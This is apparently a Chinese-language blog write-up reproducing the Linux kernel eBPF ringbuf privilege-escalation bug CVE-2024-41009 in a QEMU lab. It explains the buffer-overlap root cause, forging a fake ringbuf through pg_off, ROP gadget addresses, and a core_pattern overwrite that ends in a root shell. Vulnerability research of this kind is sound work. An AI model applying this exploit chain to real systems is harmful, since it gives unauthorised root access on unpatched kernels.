CVE-2024-41009 是eBPF ringbuf map
模块一个Buffer overlapping
问题,可以利用来提权。内核版本从v5.8 到 v6.9存在这个问题。ringbuf在内核和用户空间之间建立起共享内存,经典的生产者消费者模型。内核做生产者时,内核内由eBPF写入共享内存,用户空间作为消费者读取共享内存。问题出现在用户空间做消费者模式中,bpf ringbuf map在内核内有结构struct bpf_ringbuf
表示,consumer_pos
字段用户空间可写的,内核在使用时没有做到很好的检查,从而导致同一段内存可以同时属于两块不同的buf。
漏洞原理
看一下bpf_ringbuf
内存布局: consumer_pos,producer_pos,data
都是页对齐的,这样bpf_ringbuf->consumer_pos
前的部分占到一页,consumer_pos
占一页,prdoucer_pos
和pending_pos
占一页,再后面才是数据区。
16K大小的ringbuf,实际会用到7个page(page1 consumer_pos 前,page2 consumer_pos
,page3 producer_pos
,data 4页16K)。consumer_pos
这一页可以写方式映射mmap(ringbuf_map_mmap_kern)
到用户空间。
struct bpf_ringbuf {
wait_queue_head_t waitq;
struct irq_work work;
u64 mask;
struct page **pages;
int nr_pages;
spinlock_t spinlock ____cacheline_aligned_in_smp;
atomic_t busy ____cacheline_aligned_in_smp;
unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
unsigned long pending_pos;
char data[] __aligned(PAGE_SIZE);
};
- work - 含有函数指针
func
, ringbuf释放时调用 - consumer_pos - 标记读取位置,可以单独mapping到用户空间,由于mmap是对内存区进行操作(即VMA),而内存区是页对齐的,虽然这个字段只有8字节,却占了一个整页
- data - 数据区
buf从data部分分配,每个buf的header部分8字节是bpf_ringbuf_hdr
,eBPF和用户空间都是不能直接修改的,分配时这部分被跳过return (void *)hdr + BPF_RINGBUF_HDR_SZ
,
struct bpf_ringbuf_hdr {
u32 len;
u32 pg_off;
};
data 部分page做了两次映射,虚拟地址的后一半和前一半都指向相同的物理页。
bpf_ringbuf_area_alloc
/* Each data page is mapped twice to allow "virtual"
* continuous read of samples wrapping around the end of ring
* buffer area:
* ------------------------------------------------------
* | meta pages | real data pages | same data pages |
* ------------------------------------------------------
* | | 1 2 3 4 5 6 7 8 9 | 1 2 3 4 5 6 7 8 9 |
* ------------------------------------------------------
* | | TA DA | TA DA |
* ------------------------------------------------------
* ^^^^^^^
* |
* Here, no need to worry about special handling of wrapped-around
* data due to double-mapped data pages. This works both in kernel and
* when mmap()'ed in user-space, simplifying both kernel and
* user-space implementations significantly.
*/
array_size = (nr_meta_pages + 2 * nr_data_pages) * sizeof(*pages);
pages = bpf_map_area_alloc(array_size, numa_node);
if (!pages)
return NULL;
for (i = 0; i < nr_pages; i++) {
page = alloc_pages_node(numa_node, flags, 0);
if (!page) {
nr_pages = i;
goto err_free_pages;
}
pages[i] = page;
if (i >= nr_meta_pages)
pages[nr_data_pages + i] = page;
}
rb = vmap(pages, nr_meta_pages + 2 * nr_data_pages,
VM_MAP | VM_USERMAP, PAGE_KERNEL);
if (rb) {
kmemleak_not_leak(pages);
rb->pages = pages;
rb->nr_pages = nr_pages;
return rb;
}
复现利用过程
总结起来,整个利用过程是:
- 篡改
consumer_pos
- eBPF分配出overlapping 内存
- 利用overlapping篡改buf hdr
pg_off
字段 - 释放buf,从
pg_off
得到fake bpf_ringbuf
- 执行fake func
- 篡改
core_pattern
- 主动crash,触发core_dump执行任意命令
- 拿到flag及root bash
用户态篡改consumer_pos
创建大小16K的ringbuf, 将consumer_pos页映射到用户空间,修改成0x3000; 通过eBPF分配两个0x3000大小的buf, 因为总大小只有0x4000, 正常第二次会失败。但由于已经将consumer_pos修改成了0x3000, 检查会被绕过:
__bpf_ringbuf_reserve
if (new_prod_pos - cons_pos > rb->mask) {
spin_unlock_irqrestore(&rb->spinlock, flags);
return NULL;
}
分配出overlapping 内存块
buf大小选择16K,nr_meta_pages = 4, 这样[0, 0x1000] 与 [0x4000, 0x5000]是同一个page, 0x4000指向了chunk A’s hdr 分配出A - [0, 0x3008], B - [0x3008, 0x6010], eBPF可以访问[0x3010, 0x6010], 通过B’s 0x4000可以修改A的hdr meta数据。buf回收时,bpf_ringbuf_restore_from_rec根据hdr的pg_off计算ringbuf的地址。
bpf_ringbuf_discard
bpf_ringbuf_commit
struct buf_ringbuf *rb = bpf_ringbuf_restore_from_rec(hdr);
unsigned long off = (unsigned long)hdr->pg_off << PAGE_SHIFT;
return (void*)((addr & PAGE_MASK) - off);
通过第二块buf,篡改第一块buf的hdr->len
从上面ringbuf的内存布局知道,第一块buf也就是data到consumer_pos
相差的页是2个,到到这里可以将第一块buf的hdr->pg_off
改写成2,这样在bpf_ringbuf_commit函数中,从buf的hdr计算ringbuf时,计算出的ringbug就是用户空间完全控制的内存 - consumer_pos
内存页。consumer_pos
这页内存就充当了fake bpf_ringbuf。
再看struct bpf_ringbuf
结构,含有一个irq_work的结构work,其中func是一个函数指针。只要将fake bpf_ringbuf
的func改成ROP就可以执行任意代码。
struct irq_work {
struct __call_single_node node;
void (*func)(struct irq_work *);
struct rcuwait irqwait;
};
ROP构造
func在bpf_ringbuf
结构的0x28偏移处,前面已将ringbuf调整到consumer_pos
处,只要将consumer_pos+0x28设置成stack pivot ROP, 当func执行到时,就可以运行ROP控制执行流。
我在自己编译的vmlinux中没有找到像原POC中那么理想的stack pivot ROP push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
在func执行时irq_work_queue(&rb->work)
, rbx/rdi都是work的地址,也就是ringbuf+0x18
(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work)
$2 = 0x18
stack pivot rop 未找到rsp设置成功后避开+0x20的rop,只找到0xffffffff8225c149,这个gadget执行完后,rsp调整到0x20处。
0xffffffff8225c149 <inet_diag_msg_common_fill+105>: push %rbx
0xffffffff8225c14a <inet_diag_msg_common_fill+106>: and %bl,0x41(%rbx)
0xffffffff8225c14d <inet_diag_msg_common_fill+109>: pop %rsp
0xffffffff8225c14e <inet_diag_msg_common_fill+110>: pop %rbp
0xffffffff8225c14f <inet_diag_msg_common_fill+111>: ret
+0x20处设置为别的gadget后发现不能触发,+0x20处是bpf_ringbuf.work.node.a_flags
, 此处设为0xffff时,没有触发bug,既无crash也未成功,设置为0xff22时,panic报出异常地址0xff22, 这说明最低位设为0x22可绕过, 实际上irq_work_claim
有flag检查 if (oflags & IRQ_WORK_PENDING)
, 选择地址地末位是0x22的rop - 0xffffffff820df722:
pop r13, pop r14, pop rbp, ret
(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work.node.a_flags)
$4 = 0x20
0x22 == CSD_TYPE_IRQ_WORK(0x20) | IRQ_WORK_BUSY (0x02);
IRQ_WORK_PENDING = 0x1
接下来通过ROP修改core_pattern
值为memfd |/proc/%P/fd/666 %P
,并将memfd复制为利用程序自身,完成之后利用程序主动crash,触发coredump产生,内核已root权限运行exploit程序自身,完成提权。
复现:
所有的rop必须在[_stext, _etext]之间,否则会触发NX错误:
81.766165] kernel tried to execute NX-protected page - exploit attempt? (uid: 1000)
[ 81.792896] BUG: unable to handle page fault for address: ffffffff8299a052
[ 81.810767] #PF: supervisor instruction fetch in kernel mode
[ 81.823853] #PF: error_code(0x0011) - permissions violation
ts[0[ ] 81:. 853,6 socket248] PGD 3c46067 P4D 3c46067 PUD 3c47063 PMD 80000000028001e1
[ 81.851043] Oops: 0011 [#1] PREEMPT SMP PTI
test:
$ ./poc
Hello World!
try to wait core
[ 95.464768] BUG: scheduling while atomic: poc/354/0x00010002
[ 95.478632] Modules linked in:
sock[ 95.486469] Preemption disabled at:
[ 95.486474] [<ffffffff81310e23>] irq_work_queue+0x23/0x50
ets[0]: 5, socke[ 95.508029] CPU: 1 PID: 354 Comm: poc Not tainted 6.3.0 #93
[ 95.526632] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
t[1]: 6
[ 95.599172] Call Trace:
[ 95.677927] ------------[ cut here ]------------
[ 95.683175] Voluntary context switch within RCU read-side critical section!
[ 95.683816] WARNING: CPU: 1 PID: 354 at kernel/rcu/tree_plugin.h:318 rcu_note_context_switch+0x62c/0x690
[ 95.713178] Modules linked in:
[ 95.718262] CPU: 1 PID: 354 Comm: poc Tainted: G W 6.3.0 #93
[ 95.735521] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 95.752900] RIP: 0010:rcu_note_context_switch+0x62c/0x690
[ 95.762138] Code: 00 00 00 00 0f 85 0d fd ff ff 49 89 8c 24 a0 00 00 00 e9 00 fd ff ff 48 c7 c7 a8 24 27 83 c6 05 75 08 ce 02 01 e8 a4 82 f6 ff <0f> 0b e9 3b fa ff ff 49 83 bc 24 98 00 00 00 00 49 8b 84 24 a0 00
[ 95.793147] RSP: 0018:ffffc900009adf40 EFLAGS: 00010086
[ 95.801582] RAX: 0000000000000000 RBX: ffff88813bcb3700 RCX: 0000000000000000
[ 95.814821] RDX: 0000000000000003 RSI: 0000000000000027 RDI: 00000000ffffffff
[ 95.828898] RBP: 0000000000000000 R08: 00000000ffffdfff R09: 0000000000000001
[ 95.840645] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88813bcb2880
[ 95.854500] R13: ffff888102acb240 R14: 0000000000000000 R15: 0000000000000000
[ 95.871507] FS: 0000000000da2380(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 95.890278] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 95.901485] CR2: 00000000004b9000 CR3: 0000000102a02000 CR4: 0000000000050ee0
[ 95.918447] Call Trace:
[ 95.925747] ---[ end trace 0000000000000000 ]---
[ 96.027876] poc[355]: segfault at 0 ip 000000000040248d sp 00007ffc781827d0 error 6 in poc[401000+89000] likely on CPU 1 (core 1, socket 0)
[ 96.075993] Code: df e8 97 fb 01 00 ba 10 00 00 00 4c 89 ee 48 89 ef e8 47 ec ff ff 85 c0 0f 85 4f ff ff ff 48 8d 3d d6 7b 08 00 e8 03 46 00 00 <48> c7 04 25 00 00 00 00 00 00 00 00 0f 0b 0f 1f 44 00 00 f3 0f 1e
check core: /proc/sys/kernel/core_pattern
Root shell !!
FLAG{test-by-hxqu}
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@wintermute:/#
root@wintermute:/# whoami
root
环境
kernel version using
6.3 commit 457391b0380335d5e9a5babdec90ac53928b23b4
步骤:buf-overlapping -> buf metadata -> ringbuf meta -> function pointer -> stack pivot -> ROP
全部复现文件 传送门
参考资料
文档信息
- 本文作者:seamaner
- 本文链接:https://seamaner.github.io/2025/04/13/CVE-2024-41009/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)